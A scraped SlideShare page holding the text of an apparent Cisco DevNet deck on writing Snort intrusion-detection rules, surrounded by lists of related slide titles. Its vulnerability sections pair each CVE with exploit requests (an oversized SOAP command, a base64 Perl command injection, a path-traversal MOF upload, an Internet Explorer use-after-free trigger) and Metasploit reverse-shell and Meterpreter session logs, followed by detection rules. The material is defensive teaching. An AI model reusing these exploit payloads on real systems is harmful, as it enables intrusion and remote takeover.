Secure shell ppt
sravya raju
 
Introduction to Snort
Hossein Yavari
 
Ssh (The Secure Shell)
Mehedi Farazi
 
Ad

Viewers also liked (20)

PPTX
Snort IDS/IPS Basics
Mahendra Pratap Singh
 
PDF
Snort-IPS-Tutorial
Vladimir Koychev
 
PDF
Snort IPS
Simone Tino
 
PDF
Starting the DevOps Train
Cisco DevNet
 
PPTX
DEVNET-1166 Open SDN Controller APIs
Cisco DevNet
 
PDF
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
Cisco DevNet
 
PPT
Intrusion detection system ppt
Sheetal Verma
 
PDF
Snort manual
Miguel A. Gómez Álvarez
 
PDF
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
ijsrd.com
 
PPTX
ImmaginAzione - svilupparla col metodo Woodys®
Diego Senziani
 
ODP
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
Joshua S. White, PhD josh@securemind.org
 
PDF
Sms compliance white paper for mobile communications
TextGuard
 
PPTX
Regular Expression Mining System for Information Extraction
Dimuthu Samarasekara
 
PPTX
Malicious traffic
Ishraq Al Fataftah
 
PPTX
Pcre introduciton
Yi-Jun Zheng
 
PPT
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
amiable_indian
 
PPTX
All About Snort
28pranjal
 
PPTX
Snort IDS
primeteacher32
 
PPTX
Industrial Training - Network Intrusion Detection System Using Snort
Disha Bedi
 
PDF
Snort
bala150985
 
Snort IDS/IPS Basics
Mahendra Pratap Singh
 
Snort-IPS-Tutorial
Vladimir Koychev
 
Snort IPS
Simone Tino
 
Starting the DevOps Train
Cisco DevNet
 
DEVNET-1166 Open SDN Controller APIs
Cisco DevNet
 
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
Cisco DevNet
 
Intrusion detection system ppt
Sheetal Verma
 
Snort manual
Miguel A. Gómez Álvarez
 
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
ijsrd.com
 
ImmaginAzione - svilupparla col metodo Woodys®
Diego Senziani
 
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
Joshua S. White, PhD josh@securemind.org
 
Sms compliance white paper for mobile communications
TextGuard
 
Regular Expression Mining System for Information Extraction
Dimuthu Samarasekara
 
Malicious traffic
Ishraq Al Fataftah
 
Pcre introduciton
Yi-Jun Zheng
 
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
amiable_indian
 
All About Snort
28pranjal
 
Snort IDS
primeteacher32
 
Industrial Training - Network Intrusion Detection System Using Snort
Disha Bedi
 
Snort
bala150985
 
Ad

Similar to Introduction to Snort Rule Writing (20)

PDF
SnortUsersWebcast-Rules_pt2
Liễu Hồng
 
PPTX
USE_OF_PACKET_CAPTURE.pptx
rajaguru91
 
PDF
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
PPT
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
masoodnt10
 
PPT
Presentation
Lior Boim
 
PPT
PPT
webhostingguy
 
PPT
Packet_Filteringfgasdgasdgsagdsgsagasg.ppt
VerdiFerdiansyah1
 
PDF
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Codemotion
 
PPTX
RHCE (RED HAT CERTIFIED ENGINEERING)
Sumant Garg
 
PPT
Marrion Kujinga ; Firewalls
Marrion Kujinga
 
PDF
Computer network (10)
NYversity
 
PPT
Application Layer and Socket Programming
elliando dias
 
PDF
Meterpreter in Metasploit User Guide
Khairi Aiman
 
PPT
Ch 22: Web Hosting and Internet Servers
webhostingguy
 
KEY
Apache Wizardry - Ohio Linux 2011
Rich Bowen
 
PPT
20 access lists[1]
Gerard Vevele
 
PPTX
Basic IT 2 (General IT Knowledge-2)
kholis_mjd
 
PPTX
BITM3730Week10.pptx
MattMarino13
 
PDF
How cgi scripting works
RaxTonProduction
 
PPT
Lession2 Xinetd
leminhvuong
 
SnortUsersWebcast-Rules_pt2
Liễu Hồng
 
USE_OF_PACKET_CAPTURE.pptx
rajaguru91
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
masoodnt10
 
Presentation
Lior Boim
 
PPT
webhostingguy
 
Packet_Filteringfgasdgasdgsagdsgsagasg.ppt
VerdiFerdiansyah1
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Codemotion
 
RHCE (RED HAT CERTIFIED ENGINEERING)
Sumant Garg
 
Marrion Kujinga ; Firewalls
Marrion Kujinga
 
Computer network (10)
NYversity
 
Application Layer and Socket Programming
elliando dias
 
Meterpreter in Metasploit User Guide
Khairi Aiman
 
Ch 22: Web Hosting and Internet Servers
webhostingguy
 
Apache Wizardry - Ohio Linux 2011
Rich Bowen
 
20 access lists[1]
Gerard Vevele
 
Basic IT 2 (General IT Knowledge-2)
kholis_mjd
 
BITM3730Week10.pptx
MattMarino13
 
How cgi scripting works
RaxTonProduction
 
Lession2 Xinetd
leminhvuong
 

More from Cisco DevNet (20)

PPTX
How to Contribute to Ansible
Cisco DevNet
 
PPTX
Rome 2017: Building advanced voice assistants and chat bots
Cisco DevNet
 
PPTX
How to Build Advanced Voice Assistants and Chatbots
Cisco DevNet
 
PPTX
Cisco Spark and Tropo and the Programmable Web
Cisco DevNet
 
PPTX
Device Programmability with Cisco Plug-n-Play Solution
Cisco DevNet
 
PPTX
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Cisco DevNet
 
PPTX
Application Visibility and Experience through Flexible Netflow
Cisco DevNet
 
PPTX
WAN Automation Engine API Deep Dive
Cisco DevNet
 
PPTX
Cisco's Open Device Programmability Strategy: Open Discussion
Cisco DevNet
 
PPTX
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Cisco DevNet
 
PPTX
NETCONF & YANG Enablement of Network Devices
Cisco DevNet
 
PPTX
UCS Management APIs A Technical Deep Dive
Cisco DevNet
 
PPTX
OpenStack Enabling DevOps
Cisco DevNet
 
PPTX
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
Cisco DevNet
 
PPTX
Getting Started: Developing Tropo Applications
Cisco DevNet
 
PPTX
Cisco Spark & Tropo API Workshop
Cisco DevNet
 
PPTX
Coding 102 REST API Basics Using Spark
Cisco DevNet
 
PPTX
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco DevNet
 
PPTX
DevNet Express - Spark & Tropo API - Lisbon May 2016
Cisco DevNet
 
PPTX
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
Cisco DevNet
 
How to Contribute to Ansible
Cisco DevNet
 
Rome 2017: Building advanced voice assistants and chat bots
Cisco DevNet
 
How to Build Advanced Voice Assistants and Chatbots
Cisco DevNet
 
Cisco Spark and Tropo and the Programmable Web
Cisco DevNet
 
Device Programmability with Cisco Plug-n-Play Solution
Cisco DevNet
 
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Cisco DevNet
 
Application Visibility and Experience through Flexible Netflow
Cisco DevNet
 
WAN Automation Engine API Deep Dive
Cisco DevNet
 
Cisco's Open Device Programmability Strategy: Open Discussion
Cisco DevNet
 
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Cisco DevNet
 
NETCONF & YANG Enablement of Network Devices
Cisco DevNet
 
UCS Management APIs A Technical Deep Dive
Cisco DevNet
 
OpenStack Enabling DevOps
Cisco DevNet
 
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
Cisco DevNet
 
Getting Started: Developing Tropo Applications
Cisco DevNet
 
Cisco Spark & Tropo API Workshop
Cisco DevNet
 
Coding 102 REST API Basics Using Spark
Cisco DevNet
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco DevNet
 
DevNet Express - Spark & Tropo API - Lisbon May 2016
Cisco DevNet
 
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
Cisco DevNet
 

Recently uploaded (20)

PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PDF
Modernizing your data center with Dell and AMD
Principled Technologies
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
PDF
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
SHREYAS PHANSE
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
Cloud computing and distributed systems.
kkkkkhan
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Encapsulation theory and applications.pdf
gurumoop
 
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
Teaching material agriculture food technology
LiaRayya
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Modernizing your data center with Dell and AMD
Principled Technologies
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
SHREYAS PHANSE
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 

Introduction to Snort Rule Writing

  • 2. Snort Rule Syntax # rule header alert tcp any any -> 192.168.1.0/24 111 ( rule action protocol src address src port dst address dst port
  • 3. Snort Rule Syntax # rule option format alert tcp any any -> 192.168.1.0/24 111 ( msg:"Rule Message"; rule option rule option argument
  • 4. rule option: content # content match example alert tcp any any -> 192.168.1.0/24 111 ( content:"ABCD"; # is equivalent to: content:"|41 42 43 44|"; The content match finds a static pattern in network data.
  • 5. content modifiers: nocase # content match modifiers: nocase alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" or "abcd" etc. content:"ABCD"; nocase; nocase makes a content match case insensitive. content matches are case sensitive by default.
  • 6. content modifiers: offset # content match modifiers: offset alert tcp any any -> 192.168.1.0/24 111 ( # skip 2 bytes before searching for "ABCD" content:"ABCD"; offset:2; offset requires the match to occur after the designated offset in network data.
  • 7. content modifiers: depth # content match modifiers: depth alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" within the first 4 bytes of the payload content:"ABCD"; depth:4; depth restricts how far Snort should search for the specified pattern.
  • 8. content modifiers: distance # content match modifiers: distance alert tcp any any -> 192.168.1.0/24 111 ( # find "DEF" 1 byte after "ABC" content:"ABC"; content:"DEF"; distance:1; distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern relative to the end of the previous pattern match.
  • 9. content modifiers: within # content match modifiers: within alert tcp any any -> 192.168.1.0/24 111 ( # find "EFG" within 10 bytes of "ABC" content:"ABC"; content:"EFG"; within:10; within makes sure that at most N bytes are between pattern matches.
  • 10. negated content match # negated content match alert tcp any any -> 192.168.1.0/24 111 ( # make sure "EFG" is NOT within 10 bytes of "ABC" content:"ABC"; content:!"EFG"; within:10; content matches can be negated.
  • 11. content buffers # content buffer example alert tcp any any -> 192.168.1.0/24 111 ( # match "ABC" within the HTTP URI content:"ABC"; http_uri; content matches can be restricted to a payload location, such as the HTTP URI.
  • 12. content buffers POST /index.php HTTP/1.1 Host: example.com Content-Length: 28 Content-Type: application/x-www-form-urlencoded Cookie: this_is_a_cookie=this_is_its_value firstparam=one&secondparam=two Buffers: http_method http_uri http_header http_cookie http_client_body
  • 13. content modifiers: fast_pattern # fast_pattern example alert tcp any any -> 192.168.1.0/24 111 ( # set "ABC" as the rule fast_pattern content:"ABC"; fast_pattern; fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the “entrance” condition for rule evaluation.
  • 14. content modifiers: fast_pattern # fast_pattern:only; example alert tcp any any -> 192.168.1.0/24 111 ( # set "ABC" as the rule fast_pattern content:"ABC"; fast_pattern:only; fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule “enters”.
  • 15. rule option: pcre # pcre rule option example alert tcp any any -> 192.168.1.0/24 111 ( # match the following regex pcre:"/A[BC]D/i"; pcre declares a Perl compatible regular expression for matching on payload data. Flags can be specified after the slash. e.g. /i for case insensitivity.
  • 16. Traffic Triage and Isolation Normal Trafficfast_pattern content, etc. Vulnerable Application Traffic Slow Fast pcre content, etc. Vulnerable Parameter Traffic Vulnerability Condition Vulnerability Condition Traffic VolumeSpeed Traffic Type
  • 18. Detection Topics > Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 19. Buffer Overflow Overview Stack buffer overflow in AVM Fritz!Box daemon dsl_control. AVM Fritz!Box firmware fails to check the length of user supplied data in a 'se' or ScriptExecute command sent in a SOAP request to the dsl_control daemon.
  • 20. Buffer Overflow Overview dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function: [...] DSL_CPE_CLI_CMD_ADD_COMM ( "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe); [...]
  • 21. Buffer Overflow Overview DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...]) { [...] DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0}; if(DSL_CPE_CLI_CheckParamNumber(pCommands,1, DSL_CLI_EQUALS) == DSL_FALSE) { return -1; } DSL_CPE_sscanf(pCommands, "%s", sFileName); [...]
  • 22. Buffer Overflow Overview The code calls the function DSL_CPE_sscanf in order to copy the value of the parameter pCommands to the local character array sFileName without restricton or bounds checking. The size of the vulnerable stack buffer is 256 bytes as indicated in dsl_cpi_cli_console.h: #define DSL_MAX_COMMAND_LINE_LENGTH 256 Triggering the vulnerability is then a simple matter of sending >256 bytes in the first 'se' parameter.
  • 23. Buffer Overflow Exploit <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV= "http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ifx="urn:dsl_api"> <SOAP-ENV:Body> <ifx:DslCpeCliAccess> <command>se "A"*300</command> </ifx:DslCpeCliAccess> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 24. Buffer Overflow Detection # vulnerable SOAP request # with at least 256 bytes # within <command></command> # content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; content:"<command"; nocase; http_client_body; isdataat:256,relative; content:!"</command"; nocase; within:256; http_client_body; # stack buffer overflow (>256 bytes) # within param0: <command> se param0 </command> # pcre:"/<command[^>]*?>s*ses[^<]{256}/Pi";
  • 25. Buffer Overflow Detection alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; flow:to_server,established; content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; content:"<command"; nocase; http_client_body; isdataat:256,relative; content:!"</command"; within:256; nocase; http_client_body; pcre:"/<command[^>]*?>s*ses[^<]{256}/Pi"; metadata:policy security-ips drop, service http; classtype:attempted-admin; )
  • 26. Detection Topics > Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 27. Detection Topics Buffer Overflow > Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 28. Command Injection Overview CVE-2014-3805 Command injection vulnerabilities in AlienVault OSSIM av- centerd, which accepts SOAP commands on port 40007. SOAP command 'get_log_line' parameter '$number_lines' and 'get_license' parameter '$license_type' are used in OS commands without sanitization.
  • 29. Command Injection Overview /usr/share/alienvault-center/lib/AV/CC/Util.pm sub get_log_line() { my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) = @_; [...] # $number_lines used in OS command without sanitization my $command = "tail -$number_lines $r_file"; my @content = `$command`; [...] }
  • 30. Command Injection Overview /usr/share/alienvault-center/lib/AV/CC/Util.pm sub get_license() { my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_; [...] # $license_type used in OS command without sanitization my $package = system ("curl --proxy-anyauth -K /etc/curlrc http://[...]/avl/$license_type/[...]"); }
  • 31. Command Injection Exploit POST /av-centerd HTTP/1.1 Host: 172.16.8.223:40007 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 765 Content-Type: text/xml; charset=utf-8 SOAPAction: "AV/CC/Util#get_log_line" <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c- gensym13></get_log_line></soap:Body></soap:Envelope>
  • 32. Command Injection Exploit POST /av-centerd HTTP/1.1 Host: 172.16.8.223:40007 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 765 Content-Type: text/xml; charset=utf-8 SOAPAction: "AV/CC/Util#get_log_line" <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c- gensym13></get_log_line></soap:Body></soap:Envelope>
  • 33. Command Injection Exploit msf exploit(alienvault_centerd_soap_exec) > exploit [*] Started reverse handler on 172.16.158.1:4444 [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500 id uid=0(root) gid=0(root) groups=0(root) remember traffic isolation...
  • 34. Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; flow:to_server,established; content:"/av-centerd"; nocase; http_uri; content:"<get_log_line"; fast_pattern; nocase; http_client_body; content:"xsd:string"; distance:0; nocase; http_client_body; pcre:"/xsdx3astring[^>]*?>[^<]*?([x3bx7cx26x60]|x24x28)/Pi"; metadata:service http; reference:cve,2014-3805; classtype:attempted-admin; )
  • 35. Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; flow:to_server,established; content:"/av-centerd"; nocase; http_uri; content:"<get_license"; fast_pattern; nocase; http_client_body; content:"xsd:string"; distance:0; nocase; http_client_body; pcre:"/xsdx3astring[^>]*?>[^<]*?([x3bx7cx26x60]|x24x28)/Pi"; metadata:service http; reference:cve,2014-3805; classtype:attempted-admin; )
  • 36. Command Injection Overview CVE-2014-5073 OS command injection vulnerability in VMTurbo Operations Manager vmtadmin.cgi parameter 'fileDate'. If the 'callType' parameter is set to "DOWN" vmtadmin.cgi will pass the value of 'fileDate' to system().
  • 37. Command Injection Overview my $actiontype = $query->param("actionType"); my $calltype = $query->param("callType"); my $filedate = $query->param("fileDate"); my $statusfile = (defined $filedate) ? $filedate : $mon.".".$mday." [...] [...] elseif ($calltype eq "DOWN") { [...] system("rm "$upload_dir$statusfile""); [...]
  • 38. Command Injection Exploit GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP &fileDate=%22%60printf%20%27177105114[...] HTTP/1.1 Host: 172.16.41.140 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 0
  • 39. Command Injection Exploit GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP &fileDate=%22%60printf%20%27177105114[...] HTTP/1.1 Host: 172.16.41.140 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 0
  • 40. Command Injection Exploit msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit [*] Started reverse handler on 172.16.158.1:4444 [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500 id uid=0(root) gid=0(root) groups=0(root)
  • 41. Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; flow:to_server,established; metadata:policy security-ips drop, service http; reference:cve,2014-5073; classtype:attempted-admin; ) content:"callType=DOWN"; nocase; http_uri; content:"fileDate="; nocase; http_uri; pcre:"/[?&]fileDate=[^&]*?([x60x3bx7c]|[x3cx3ex24]x28)/Ui"; Start by isolating traffic. content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
  • 42. Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; flow:to_server,established; content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; content:"callType=DOWN"; nocase; http_uri; content:"fileDate="; nocase; http_raw_uri; content:"%26"; distance:0; http_raw_uri; pcre:"/[?&]fileDate=[^&]*?%26/Ii"; metadata:policy security-ips drop, service http; reference:cve,2014-5073; classtype:attempted-admin; )
  • 43. Detection Topics Buffer Overflow > Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 44. Detection Topics Buffer Overflow Command Injection > Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 45. Directory Traversal Overview CVE-2014-2424 Directory traversal vulnerability in Oracle Event processing. FileUploadServlet function processUploadedFile() fails to properly sanitize the filename parameter value. The WMI service can be abused to convert the file upload into remote code execution without user interaction.
  • 46. Directory Traversal Overview private void processUploadedFile(FileItem paramFileItem) { try { // paramFileItem.getName() used to // create file without verification paramFileItem.write(new File(this.uploadLocation, paramFileItem.getName())); } catch (Exception localException) { [...] } }
  • 47. Directory Traversal Exploit POST /wlevs/visualizer/upload HTTP/1.1 Host: 172.16.8.29:9002 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828 Content-Length: 2658 --_Part_732_2993821416_1334322828 Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof" Content-Type: application/octet-stream Content-Transfer-Encoding: binary #pragma namespace(".rootcimv2") [...]
  • 48. Directory Traversal Exploit POST /wlevs/visualizer/upload HTTP/1.1 Host: 172.16.8.29:9002 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828 Content-Length: 2658 --_Part_732_2993821416_1334322828 Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof" Content-Type: application/octet-stream Content-Transfer-Encoding: binary #pragma namespace(".rootcimv2") [...]
  • 49. Directory Traversal Exploit msf exploit(oracle_event_processing_upload) > rexploit [*] Reloading module... [*] Started reverse handler on 172.16.158.1:4444 [*] 172.16.158.198:9002 - Generating payload and mof file... [*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe... [*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof [*] Sending stage (769536 bytes) to 172.16.158.198 [*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500 [+] Deleted wbem/mof/klIvousnq.mof [!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target meterpreter > getuid Server username: NT AUTHORITYSYSTEM
  • 50. Directory Traversal Detection # # Multipart POST # content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename"; nocase; http_client_body; content:"Content-Disposition"; nocase; http_client_body; pcre:"/filenames*=s*[^rn]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pi"; # # Urlencoded POST # content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename="; nocase; http_client_body; pcre:"/(^|&)filename=[^&]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pim";
  • 51. Directory Traversal Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; flow:to_server,established; content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename"; nocase; http_client_body; content:"Content-Disposition"; nocase; http_client_body; pcre:"/filenames*=s*[^rn]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pi"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:cve,2014-2424; classtype:attempted-admin; )
  • 52. Directory Traversal Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; flow:to_server,established; content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename="; nocase; http_client_body; pcre:"/(^|&)filename=[^&]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pim"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:cve,2014-2424; classtype:attempted-admin; )
  • 53. Detection Topics Buffer Overflow Command Injection > Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 54. Detection Topics Buffer Overflow Command Injection Directory Traversal > Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 55. Use-After-Free Overview CVE-2013-3893 This vulnerability is triggered by Javascript that sets an onlosecapture() handler on the parent of two elements. This handler clears the DOM with document.write() when it is called. The Javascript then calls setCapture() on the parent and the child element. This triggers the onlosecapture() handler, freeing a reference with document.write(). After the free, the invalid reference will remain causing a crash (or code execution) in MSHTML!CTreeNode::GetInterface.
  • 56. Use-After-Free Trigger function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); } id_0.setCapture(); id_1.setCapture(); }
  • 57. Use-After-Free Trigger 0:005> r eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CTreeNode::GetInterface+0xd8: 679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
  • 58. Use-After-Free Detection alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any ( msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; flow:to_client,established; file_data; content:".applyElement"; nocase; content:".onlosecapture"; nocase; within:500; fast_pattern; content:".setCapture"; nocase; within:500; content:".setCapture"; nocase; within:500; pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si"; metadata:service ftp-data, service http, service imap, service pop3; reference:cve,2013-3893; )
  • 59. Use-After-Free Detection alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 ( msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; flow:to_server,established; file_data; content:".applyElement"; nocase; content:".onlosecapture"; nocase; within:500; fast_pattern; content:".setCapture"; nocase; within:500; content:".setCapture"; nocase; within:500; pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si"; metadata:service smtp; reference:cve,2013-3893; )
  • 60. Detection Topics Buffer Overflow Command Injection Directory Traversal > Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 61. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free > Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
